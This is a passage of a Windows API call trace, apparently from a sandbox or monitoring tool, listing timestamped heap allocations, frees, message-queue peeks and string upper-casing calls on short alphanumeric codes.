lpsz="A1100103809") returned 0xb [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0103.683] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.684] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0103.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0103.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0103.684] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0103.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0103.684] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.685] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0103.685] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0103.685] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0103.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0103.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0103.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.686] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0103.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0103.686] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.687] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0103.687] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0103.687] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.688] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.688] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0103.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0103.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0103.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0103.689] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0103.689] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.689] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.689] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0103.689] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: 